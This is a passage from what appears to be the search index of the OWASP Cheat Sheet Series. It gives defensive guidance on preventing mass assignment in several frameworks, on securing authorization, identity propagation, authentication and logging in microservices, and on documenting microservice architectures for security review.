var\u00a0massAssign\u00a0=\u00a0require('mongoose-mass-assign');\n\nvar\u00a0UserSchema\u00a0=\u00a0new\u00a0mongoose.Schema({\nuserid:\u00a0String,\npassword:\u00a0String,\nemail\u00a0:\u00a0String,\nisAdmin\u00a0:\u00a0{\u00a0type:\u00a0Boolean,\u00a0protect:\u00a0true,\u00a0default:\u00a0false\u00a0}\n});\n\nUserSchema.plugin(massAssign);\n\nvar\u00a0User\u00a0=\u00a0mongoose.model('User',\u00a0UserSchema);\n\n/**\u00a0Static\u00a0method,\u00a0useful\u00a0for\u00a0creation\u00a0**/\nvar\u00a0user\u00a0=\u00a0User.massAssign(req.body);\n\n/**\u00a0Instance\u00a0method,\u00a0useful\u00a0for\u00a0updating**/\nvar\u00a0user\u00a0=\u00a0new\u00a0User;\nuser.massAssign(req.body);\n\n/**\u00a0Static\u00a0massUpdate\u00a0method\u00a0**/\nvar\u00a0input\u00a0=\u00a0{\u00a0userid:\u00a0'bhelx',\u00a0isAdmin:\u00a0'true'\u00a0};\nUser.update({\u00a0'_id':\u00a0someId\u00a0},\u00a0{\u00a0$set:\u00a0User.massUpdate(input)\u00a0},\u00a0console.log);\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#ruby-on-rails","title":"Ruby On Rails","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#django","title":"Django","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#asp-net","title":"ASP NET","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#php-laravel-eloquent","title":"PHP Laravel + Eloquent","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing_2","title":"Allow-listing","text":"
<?php\n\nnamespace\u00a0App;\n\nuse\u00a0Illuminate\\Database\\Eloquent\\Model;\n\nclass\u00a0User\u00a0extends\u00a0Model\n{\n    private\u00a0$userid;\n    private\u00a0$password;\n    private\u00a0$email;\n    private\u00a0$isAdmin;\n\n    protected\u00a0$fillable\u00a0=\u00a0array('userid','password','email');\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing_2","title":"Block-listing","text":"
<?php\n\nnamespace\u00a0App;\n\nuse\u00a0Illuminate\\Database\\Eloquent\\Model;\n\nclass\u00a0User\u00a0extends\u00a0Model\n{\n    private\u00a0$userid;\n    private\u00a0$password;\n    private\u00a0$email;\n    private\u00a0$isAdmin;\n\n    protected\u00a0$guarded\u00a0=\u00a0array('isAdmin');\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#grails","title":"Grails","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#play","title":"Play","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#jackson-json-object-mapper","title":"Jackson (JSON Object Mapper)","text":"

Take a look here and here for the documentation.
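
As a purely illustrative sketch (the User class and its fields are hypothetical), block-listing with Jackson can be done with the standard @JsonIgnore annotation, so a bound request body can never set the sensitive flag:

import com.fasterxml.jackson.annotation.JsonIgnore;
import com.fasterxml.jackson.databind.ObjectMapper;

public class User {
    public String userid;
    public String password;
    public String email;

    // Block-listed: Jackson neither reads this field from incoming JSON
    // nor writes it when serializing, so mass assignment cannot set it.
    @JsonIgnore
    public boolean isAdmin;
}

class JacksonDemo {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        User user = mapper.readValue(
            "{\"userid\":\"bob\",\"password\":\"secret\",\"isAdmin\":true}", User.class);
        System.out.println(user.isAdmin); // false - the attacker-supplied value is ignored
    }
}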

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#gson-json-object-mapper","title":"GSON (JSON Object Mapper)","text":"

Take a look here and here for the documentation.
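
As a comparable sketch for GSON (again with hypothetical field names), an allow-listing style can be achieved by combining the @Expose annotation with excludeFieldsWithoutExposeAnnotation(), so only explicitly exposed fields are bound:

import com.google.gson.Gson;
import com.google.gson.GsonBuilder;
import com.google.gson.annotations.Expose;

public class User {
    @Expose public String userid;
    @Expose public String password;
    @Expose public String email;

    // Not annotated with @Expose, therefore never populated from incoming JSON.
    public boolean isAdmin;
}

class GsonDemo {
    public static void main(String[] args) {
        Gson gson = new GsonBuilder()
                .excludeFieldsWithoutExposeAnnotation()
                .create();
        User user = gson.fromJson(
                "{\"userid\":\"bob\",\"password\":\"secret\",\"isAdmin\":true}", User.class);
        System.out.println(user.isAdmin); // false - ignored during deserialization
    }
}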

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#json-lib-json-object-mapper","title":"JSON-Lib (JSON Object Mapper)","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#flexjson-json-object-mapper","title":"Flexjson (JSON Object Mapper)","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#references-and-future-reading","title":"References and future reading","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html","title":"Microservices Security Cheat Sheet","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The microservice architecture is increasingly used for designing and implementing application systems in both cloud-based and on-premise infrastructures, high-scale applications and services. There are many security challenges that need to be addressed in the application design and implementation phases. The fundamental security requirements that have to be addressed during the design phase are authentication and authorization. Therefore, it is vital for application security architects to understand and properly use existing architecture patterns to implement authentication and authorization in microservices-based systems. The goal of this cheat sheet is to identify such patterns and to make recommendations for application security architects on possible ways to use them.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#edge-level-authorization","title":"Edge-level authorization","text":"

In a simple scenario, authorization can happen only at the edge level (API gateway). The API gateway can be leveraged to centralize enforcement of authorization for all downstream microservices, eliminating the need to provide authentication and access control for each of the individual services. In such a case, NIST recommends implementing mitigating controls such as mutual authentication to prevent direct, anonymous connections to the internal services (API gateway bypass). It should be noted that authorization at the edge layer has the following limitations:

In most cases, development teams implement authorization in both places -- at the edge level at a coarse level of granularity, and at the service level. To authenticate an external entity, the edge can use access tokens (referenced tokens or self-contained tokens) transmitted via HTTP headers (e.g., "Cookie" or "Authorization") or use mTLS.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-level-authorization","title":"Service-level authorization","text":"

Service-level authorization gives each microservice more control to enforce access control policies. For further discussion, we use terms and definitions in accordance with NIST SP 800-162. The functional components of an access control system can be classified in the following way:

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-level-authorization-existing-patterns","title":"Service-level authorization: existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#decentralized-pattern","title":"Decentralized pattern","text":"

The development team implements the PDP and PEP directly at the microservice code level. All the access control rules, as well as the attributes needed to implement those rules, are defined and stored on each microservice (step 1). When a microservice receives a request (step 2) along with some authorization metadata (e.g., end user context or requested resource ID), the microservice analyzes it (step 3) in order to generate an access control policy decision and then enforces authorization (step 4). Existing programming language frameworks allow development teams to implement authorization at the microservice layer. E.g., Spring Security allows developers to enable scope checking (e.g., using scopes extracted from the incoming JWT) in the resource server and use it to enforce authorization. Implementing authorization at the source code level means that the code must be updated whenever the development team wants to modify the authorization logic.
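
As a hedged sketch of the Spring Security scope checking mentioned above (the endpoint path and scope name are illustrative, and the application is assumed to be configured as an OAuth2 resource server with method security enabled), the rule is enforced directly inside the microservice:

import org.springframework.http.ResponseEntity;
import org.springframework.security.access.prepost.PreAuthorize;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class OrderController {

    // PDP and PEP live inside the service: Spring Security evaluates the rule
    // against the scopes extracted from the incoming JWT (mapped to "SCOPE_" authorities).
    @PreAuthorize("hasAuthority('SCOPE_orders:read')")
    @GetMapping("/orders/{id}")
    public ResponseEntity<String> getOrder(@PathVariable String id) {
        return ResponseEntity.ok("order " + id);
    }
}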

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#centralized-pattern-with-single-policy-decision-point","title":"Centralized pattern with single policy decision point","text":"

In this pattern, access control rules are defined, stored, and evaluated centrally. Access control rules are defined using the PAP (step 1) and delivered to the centralized PDP, along with the attributes needed to implement those rules (step 2). When a subject invokes a microservice endpoint (step 3), the microservice code invokes the centralized PDP via a network call, and the PDP generates an access control policy decision by evaluating the query input against the access control rules and attributes (step 4). Based on the PDP decision, the microservice enforces authorization (step 5). To define access control rules, the development/operation team has to use some language or notation. Examples are the Extensible Access Control Markup Language (XACML) and Next Generation Access Control (NGAC), which are standards for describing policy rules. This pattern can negatively affect latency due to the additional network calls to the remote PDP endpoint, but this can be mitigated by caching authorization policy decisions at the microservice level. It should be mentioned that the PDP must be operated in high-availability mode due to resilience and availability requirements. Application security architects should combine it with other patterns (e.g., authorization at the API gateway level) in order to enforce the "defense in depth" principle.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#centralized-pattern-with-embedded-policy-decision-point","title":"Centralized pattern with embedded policy decision point","text":"

In this pattern, access control rules are defined centrally but stored and evaluated at the microservice level. Access control rules are defined using the PAP (step 1) and delivered to the embedded PDP, along with the attributes needed to implement those rules (step 2). When a subject invokes a microservice endpoint (step 3), the microservice code invokes the PDP, and the PDP generates an access control policy decision by evaluating the query input against the access control rules and attributes (step 4). Based on the PDP decision, the microservice enforces authorization (step 5). The PDP code in this case can be implemented as a built-in microservice library or as a sidecar in a service mesh architecture. Due to possible network/host failures and network latency, it is advisable to implement the embedded PDP as a microservice library or as a sidecar on the same host as the microservice. The embedded PDP usually stores authorization policy and policy-related data in memory to minimize external dependencies during authorization enforcement and to achieve low latency. The main difference from the "Centralized pattern with single policy decision point" with a caching approach is that authorization decisions are not stored on the microservice side; instead, up-to-date authorization policy is stored on the microservice side. It should be mentioned that caching authorization decisions may lead to applying outdated authorization rules and access control violations. Netflix presented (link, link) a real case of using the "Centralized pattern with embedded PDP" pattern to implement authorization at the microservices level.
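
A minimal, framework-agnostic sketch of what an embedded PDP library might look like is given below (all names are illustrative and do not refer to a specific product): the policy is pulled from the central PAP, cached in memory, and evaluated locally in the request path.

import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Query that the PEP sends to the embedded PDP.
record AccessRequest(String subjectRole, String action, String resourceType) {}

// Embedded PDP: keeps the policy in memory and evaluates it locally,
// so no network call is needed at authorization time.
class EmbeddedPdp {
    // "role|action|resourceType" -> allowed; refreshed from the central PAP.
    private final Map<String, Boolean> policy = new ConcurrentHashMap<>();

    // Called periodically (or via push) to load the latest rules from the PAP.
    void refreshFromPap(Map<String, Boolean> latestRules) {
        policy.clear();
        policy.putAll(latestRules);
    }

    boolean isAllowed(AccessRequest request) {
        String key = request.subjectRole() + "|" + request.action() + "|" + request.resourceType();
        return policy.getOrDefault(key, false); // default deny
    }
}

// PEP inside the microservice business code.
class OrderServicePep {
    private final EmbeddedPdp pdp;

    OrderServicePep(EmbeddedPdp pdp) {
        this.pdp = pdp;
    }

    String getOrder(String callerRole, String orderId) {
        if (!pdp.isAllowed(new AccessRequest(callerRole, "read", "order"))) {
            throw new SecurityException("access denied");
        }
        return "order " + orderId;
    }
}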

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#recommendation-on-how-to-implement-authorization","title":"Recommendation on how to implement authorization","text":"
  1. To achieve scalability, it is not advisable to hardcode authorization policy in source code (decentralized pattern), but to use a special language to express policy instead. The goal is to externalize/decouple authorization from code, and not just with a gateway/proxy that acts as a checkpoint. The recommended pattern for service-level authorization is "Centralized pattern with embedded PDP", due to its resilience and wide adoption.
  2. The authorization solution should be a platform-level solution; a dedicated team (e.g., a platform security team) must be accountable for the development and operation of the authorization solution, as well as for sharing the microservice blueprint/library/components that implement authorization among development teams.
  3. The authorization solution should be based on a widely used solution, because implementing a custom solution has the following cons:
  4. There is a probability that not all access control policy can be enforced by gateways/proxies and shared authorization libraries/components, so some specific access control rules still have to be implemented at the microservice business code level. In order to do that, it is advisable for microservice development teams to use a simple questionnaire/checklist to uncover such security requirements and handle them properly during microservice development.
  5. It is advisable to implement the "defense in depth" principle and enforce authorization at:
  6. Formal procedures for access control policy, such as development, approval, and roll-out, must be implemented.
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#external-entity-identity-propagation","title":"External entity identity propagation","text":"

To make fine-grained authorization decisions at the microservice level, the microservice has to understand the caller context (e.g., user ID, user roles/groups). In order to allow the internal service layer to enforce authorization, the edge layer has to propagate the authenticated external entity identity (e.g., end user context) along with a request to downstream microservices. One of the simplest ways to propagate the external entity identity is to re-use the access token received by the edge and pass it to internal microservices. It should be mentioned that this approach is highly insecure due to possible external access token leakage and may increase the attack surface, because the communication relies on a proprietary token-based system implementation: if an internal service is unintentionally exposed to the external network, it can be directly accessed using the leaked access token. This attack is not possible if the internal service only accepts a token format known only to internal services. This pattern is also not external access token agnostic, i.e., internal services have to understand the external access token and support a wide range of authentication techniques to extract identity from different types of external tokens (e.g., JWT, cookie, OpenID Connect token).

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#identity-propagation-existing-patterns","title":"Identity propagation: existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#send-the-external-entity-identity-as-a-clear-or-self-signed-data-structures","title":"Send the external entity identity as a clear or self-signed data structures","text":"

In this approach, the calling microservice extracts the external entity identity from the incoming request (e.g., by parsing the incoming access token), creates a data structure (e.g., JSON or a self-signed JWT) with that context, and passes it on to internal microservices. In this scenario, the recipient microservice has to trust the calling microservice -- if the calling microservice wants to violate access control rules, it can do so by setting any user/client ID or user roles it wants as the HTTP header. This approach is applicable in a highly trusted environment in which every microservice is developed by a trusted development team in accordance with secure software development practices.
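
As a rough sketch of this approach (the library choice and claim names are assumptions, not part of the original text), a calling service could build a short-lived self-signed JWT carrying the caller context, for example with the jjwt library (a JSON serializer such as jjwt-jackson is assumed on the classpath):

import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
import io.jsonwebtoken.security.Keys;

import javax.crypto.SecretKey;
import java.util.Date;
import java.util.List;

class IdentityPropagationDemo {
    public static void main(String[] args) {
        // In a real deployment the key would come from configuration or a secrets store.
        SecretKey key = Keys.secretKeyFor(SignatureAlgorithm.HS256);

        // Self-signed structure with the external entity context; it would be passed to
        // downstream microservices, e.g. in an HTTP header. Callees must trust the caller.
        String contextToken = Jwts.builder()
                .setSubject("user-42")
                .claim("roles", List.of("customer"))
                .setExpiration(new Date(System.currentTimeMillis() + 60_000))
                .signWith(key)
                .compact();

        System.out.println(contextToken);
    }
}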

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#using-a-data-structures-signed-by-a-trusted-issuer","title":"Using a data structures signed by a trusted issuer","text":"

In this pattern, after the external request is authenticated by the authentication service at the edge layer, a data structure representing the external entity identity (e.g., containing the user ID, user roles/groups or permissions) is generated, signed or encrypted by the trusted issuer and propagated to internal microservices.

Netflix presented a real case of using this pattern: a structure called "Passport", which contains the user ID and its attributes and is HMAC protected, is created at the edge level for each incoming request, propagated to internal microservices, and never exposed outside:

  1. The Edge Authentication Service (EAS) obtains a secret key from the Key Management System.
  2. The EAS receives an access token (which may be, e.g., in a cookie, a JWT, or an OAuth2 token) from the incoming request.
  3. The EAS decrypts the access token, resolves the external entity identity and sends it to the internal services in the signed "Passport" structure.
  4. Internal services can extract the user identity in order to enforce authorization (e.g., to implement identity-based authorization) using wrappers.
  5. If necessary, an internal service can propagate the "Passport" structure to downstream services in the call chain.

It should be mentioned that this pattern is external access token agnostic and allows decoupling the external entity from its internal representation.
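
As a purely illustrative sketch of the HMAC-protected structure described above (the payload format and method names are assumptions), the edge service could protect the propagated identity with a standard keyed MAC:

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

class PassportIssuer {
    // Produces "payload.signature". Only holders of the shared key (obtained from the
    // key management system) can create or verify it, and it is never accepted from
    // outside the internal network.
    static String issue(String identityPayloadJson, byte[] sharedKey) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(sharedKey, "HmacSHA256"));
        byte[] signature = mac.doFinal(identityPayloadJson.getBytes(StandardCharsets.UTF_8));

        Base64.Encoder encoder = Base64.getUrlEncoder().withoutPadding();
        return encoder.encodeToString(identityPayloadJson.getBytes(StandardCharsets.UTF_8))
                + "." + encoder.encodeToString(signature);
    }
}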

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#recommendation-on-how-to-implement-identity-propagation","title":"Recommendation on how to implement identity propagation","text":"
  1. In order to implement an external access token agnostic and extendable system, decouple the access tokens issued for external entities from their internal representation. Use a single data structure to represent and propagate the external entity identity among microservices. The edge-level service has to verify the incoming external access token, issue an internal entity representation structure, and propagate it to downstream services.
  2. Using an internal entity representation structure signed (via symmetric or asymmetric cryptography) by a trusted issuer is the recommended pattern, widely adopted by the community.
  3. The internal entity representation structure should be extensible so that additional claims can be added when needed, while keeping it compact to avoid increasing latency.
  4. Internal entity representation structure must not be exposed outside (e.g., to browser or external device).
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-to-service-authentication","title":"Service-to-service authentication","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#existing-patterns","title":"Existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#mutual-transport-layer-security","title":"Mutual transport layer security","text":"

In the mTLS approach, each microservice can legitimately identify the party it talks to, in addition to achieving confidentiality and integrity of the transmitted data. Each microservice in the deployment has to carry a public/private key pair and uses that key pair to authenticate to the recipient microservices via mTLS. mTLS is usually implemented with a self-hosted Public Key Infrastructure. The main challenges of using mTLS are key provisioning and trust bootstrapping, certificate revocation, and key rotation.
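
A minimal sketch of the client side of mTLS in plain Java is shown below (keystore locations and passwords are placeholders): the service presents its own key pair and validates the peer against the internal CA.

import javax.net.ssl.KeyManagerFactory;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;
import java.io.FileInputStream;
import java.security.KeyStore;
import java.security.SecureRandom;

class MutualTlsContext {
    static SSLContext build(char[] keyPassword, char[] trustPassword) throws Exception {
        // This service's own certificate and private key (provisioned by the internal PKI).
        KeyStore keyStore = KeyStore.getInstance("PKCS12");
        keyStore.load(new FileInputStream("service-keypair.p12"), keyPassword);
        KeyManagerFactory kmf =
                KeyManagerFactory.getInstance(KeyManagerFactory.getDefaultAlgorithm());
        kmf.init(keyStore, keyPassword);

        // Trust anchor: the internal CA that signs all microservice certificates.
        KeyStore trustStore = KeyStore.getInstance("PKCS12");
        trustStore.load(new FileInputStream("internal-ca.p12"), trustPassword);
        TrustManagerFactory tmf =
                TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(trustStore);

        SSLContext context = SSLContext.getInstance("TLS");
        context.init(kmf.getKeyManagers(), tmf.getTrustManagers(), new SecureRandom());
        return context;
    }
}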

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#token-based","title":"Token based","text":"

The token-based approach works at the application layer. A token is a container and may contain the caller ID (microservice ID) and its permissions (scopes). The caller microservice can obtain a signed token by invoking a special security token service using its own service ID and password, and then attach it to every outgoing request, e.g., via HTTP headers. The called microservice can extract the token and validate it online or offline (a sketch of the offline case follows the list below).

  1. Online scenario:
  2. Offline scenario:
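
A sketch of the offline scenario (the library and key distribution mechanism are assumptions): the called microservice validates the caller's token locally against the security token service's public key, without a network call per request.

import io.jsonwebtoken.Claims;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.JwtException;

import java.security.PublicKey;

class ServiceTokenValidator {
    private final PublicKey tokenServicePublicKey; // distributed out of band, e.g. via JWKS

    ServiceTokenValidator(PublicKey tokenServicePublicKey) {
        this.tokenServicePublicKey = tokenServicePublicKey;
    }

    // Returns the caller's claims (service ID, scopes) or throws if the token
    // is forged, expired, or otherwise invalid.
    Claims validate(String token) {
        try {
            return Jwts.parserBuilder()
                    .setSigningKey(tokenServicePublicKey)
                    .build()
                    .parseClaimsJws(token)
                    .getBody();
        } catch (JwtException e) {
            throw new SecurityException("invalid service token", e);
        }
    }
}
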
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Logging services in microservice-based systems aim to meet the principles of accountability and traceability and help detect security anomalies in operations via log analysis. Therefore, it is vital for application security architects to understand and adequately use existing architecture patterns to implement audit logging in microservices-based systems for security operations. A high-level architecture design is shown in the picture below and is based on the following principles:

High-level recommendations to logging subsystem architecture with its rationales are listed below.

  1. A microservice shall not send log messages directly to the central logging subsystem using network communication. Instead, the microservice shall write its log messages to a local log file:
  2. There shall be a dedicated component (logging agent) decoupled from the microservice. The logging agent shall collect log data on the microservice (read the local log file) and send it to the central logging subsystem. Due to possible network latency issues, the logging agent shall be deployed on the same host (virtual or physical machine) as the microservice:
  3. To mitigate a possible DoS attack on the central logging subsystem, the logging agent shall not use a request/response pattern to send log messages. Instead, there shall be a message broker to implement an asynchronous connection between the logging agent and the central logging service:
  4. Logging agent and message broker shall use mutual authentication (e.g., based on TLS) to encrypt all transmitted data (log messages) and authenticate themselves:
  5. The message broker shall enforce an access control policy to mitigate unauthorized access and implement the principle of least privilege:
  6. The logging agent shall filter/sanitize output log messages so that sensitive data (e.g., PII, passwords, API keys) is never sent to the central logging subsystem (data minimization principle). For a comprehensive overview of items that should be excluded from logging, please see the OWASP Logging Cheat Sheet.
  7. Microservices shall generate a correlation ID that uniquely identifies every call chain and helps group log messages to investigate them. The logging agent shall include a correlation ID in every log message.
  8. Logging agent shall periodically provide health and status data to indicate its availability or non-availability.
  9. The logging agent shall publish log messages in a structured log format (e.g., JSON, CSV); a short sketch follows this list.
  10. Logging agent shall append log messages with context data, e.g., platform context (hostname, container name), runtime context (class name, filename).
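
A small sketch of points 7 and 9 above (the SLF4J API is used here; a JSON encoder in the logging backend is assumed to render the structured output): the microservice puts the correlation ID into the logging context so that every locally written message carries it.

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.slf4j.MDC;

import java.util.UUID;

class PaymentHandler {
    private static final Logger log = LoggerFactory.getLogger(PaymentHandler.class);

    void handle(String incomingCorrelationId) {
        // Reuse the caller's correlation ID, or start a new call chain.
        String correlationId = incomingCorrelationId != null
                ? incomingCorrelationId
                : UUID.randomUUID().toString();
        MDC.put("correlationId", correlationId);
        try {
            log.info("payment accepted"); // the JSON encoder adds correlationId, host, class, etc.
        } finally {
            MDC.clear();
        }
    }
}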

For a comprehensive overview of events that should be logged and possible data formats, please see the OWASP Logging Cheat Sheet and the Application Logging Vocabulary Cheat Sheet.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html","title":"Microservices based Security Arch Doc Cheat Sheet","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The microservice architecture is increasingly used for designing and implementing application systems in both cloud-based and on-premise infrastructures. There are many security challenges that need to be addressed in the application design and implementation phases. In order to address some of these security challenges, it is necessary to collect security-specific information on the application architecture. The goal of this article is to provide a concrete approach to collecting microservice-based architecture information in order to secure the application.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#context","title":"Context","text":"

When securing applications based on a microservices architecture, security architects/engineers usually face the following questions (mostly referenced in the OWASP Application Security Verification Standard Project under section V1 "Architecture, Design and Threat Modeling Requirements"):

  1. Threat modeling and enforcement of the principle of least privilege:
  2. Data leakage analysis:
  3. Attack surface analysis:

In most cases, existing application architecture documentation is not suitable to answer those questions. Next sections propose what architecture security-specific information can be collected to answer the questions above.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#objective","title":"Objective","text":"

The objectives of this cheat sheet are to explain what architecture security-specific information can be collected to answer the questions above and to provide a concrete approach to collecting that information in order to secure the application.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#proposition","title":"Proposition","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#collect-information-on-the-building-blocks","title":"Collect information on the building blocks","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-application-functionality-services","title":"Identify and describe application-functionality services","text":"

Application-functionality services implement one or several business processes or pieces of functionality (e.g., storing customer details, storing and displaying the product catalog). Collect information on the parameters listed below for each application-functionality service.

Parameter name Description Service name (ID) Unique service name or ID Short description Short description of business process or functionality implemented by the microservice Link to source code repository Specify a link to service source code repository Development Team Specify development team which develops the microservice API definition If microservice exposes external interface specify a link to the interface description (e.g., OpenAPI specification). It is advisable to define used security scheme, e.g. define scopes or API keys needed to invoke dedicated endpoint (e.g., see). The microservice architecture description Specify a link to the microservice architecture diagram, description (if available) Link to runbook Specify a link to the microservice runbook"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-infrastructure-services","title":"Identify and describe infrastructure services","text":"

Infrastructure services including remote services may implement authentication, authorization, service registration and discovery, security monitoring, logging etc. Collect information on the parameters listed below related to each infrastructure service.

Parameter name Description Service name (ID) Unique service name or ID Short description Short description of functionality implemented by the service (e.g., authentication, authorization, service registration and discovery, logging, security monitoring, API gateway). Link to source code repository Specify a link to service source code repository (if applicable) Link to the service documentation Specify a link to the service documentation that includes service API definition, operational guidance/runbook, etc."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-data-storages","title":"Identify and describe data storages","text":"

Collect information on the parameters listed below related to each data storage.

Parameter name Description Storage name (ID) Unique storage name or ID Software type Specify software that implements the data storage (e.g., PostgreSQL, Redis, Apache Cassandra)."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-message-queues","title":"Identify and describe message queues","text":"

Messaging systems (e.g., RabbitMQ or Apache Kafka) are used to implement asynchronous microservices communication mechanism. Collect information on the parameters listed below related to each message queue.

Parameter name Description Message queue (ID) Unique message queue name or ID Software type Specify software that implements the message queue (e.g., RabbitMQ, Apache Kafka)."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-data-assets","title":"Identify and describe data assets","text":"

Identify and describe the data assets that are processed by the system's microservices/services. It is advisable to first identify assets that are valuable from a security perspective (e.g., "User information", "Payment"). Collect information on the parameters listed below for each asset.

Parameter name Description Asset name (ID) Unique asset name or ID Protection level Specify asset protection level (e.g., PII, confidential) Additional info Add clarifying information"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#collect-information-on-relations-between-building-blocks","title":"Collect information on relations between building blocks","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-storage-relations","title":"Identify \"service-to-storage\" relations","text":"

Collect information on the parameters listed below related to each \"service-to-storage\" relation.

Parameter name Description Service name (ID) Specify service name (ID) defined above Storage name (ID) Specify storage name (ID) defined above Access type Specify access type, e.g. \"Read\" or \"Read/Write\""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-service-synchronous-communications","title":"Identify \"service-to-service\" synchronous communications","text":"

Collect information on the parameters listed below related to each \"service-to-service\" synchronous communication.

Parameter name Description Caller service name (ID) Specify caller service name (ID) defined above Called service name (ID) Specify called service name (ID) defined above Protocol/framework used Specify protocol/framework used for communication, e.g. HTTP (REST, SOAP), Apache Thrift, gRPC Short description Briefly describe the purpose of communication (requests for query of information or request/commands for a state-changing business function) and data passed between services (if possible, in terms of the assets defined above)"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-service-asynchronous-communications","title":"Identify \"service-to-service\" asynchronous communications","text":"

Collect information on the parameters listed below related to each \"service-to-service\" asynchronous communication.

Parameter name Description Publisher service name (ID) Specify publisher service name (ID) defined above Subscriber service name (ID) Specify subscriber service name (ID) defined above Message queue (ID) Specify message queue (ID) defined above Short description Briefly describe the purpose of communication (receiving of information or commands for a state-changing business function) and data passed between services (if possible, in terms of the assets defined above)"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-asset-to-storage-relations","title":"Identify \"asset-to-storage\" relations","text":"

Collect information on the parameters listed below related to each \"asset-to-storage\" relation.

Parameter name Description Asset name (ID) Asset name (ID) defined above Storage name (ID) Specify storage name (ID) defined above Storage type Specify storage type for the asset, e.g. \"golden source\" or \"cache\""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#create-a-graphical-presentation-of-application-architecture","title":"Create a graphical presentation of application architecture","text":"

It is advisable to create a graphical representation of the application architecture (the building blocks and relations defined above) in the form of a service call graph or a data flow diagram. To do that, one can use specialized software tools (e.g., Enterprise Architect) or the DOT language. See an example of using the DOT language here.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#use-collected-information-in-secure-software-development-practices","title":"Use collected information in secure software development practices","text":"

The collected information may be useful for application security practices, e.g., when defining security requirements, threat modeling or security testing. The sections below contain examples of activities related to securing the application architecture (as well as their mapping to OWASP projects) and tips for their implementation using the information collected above.

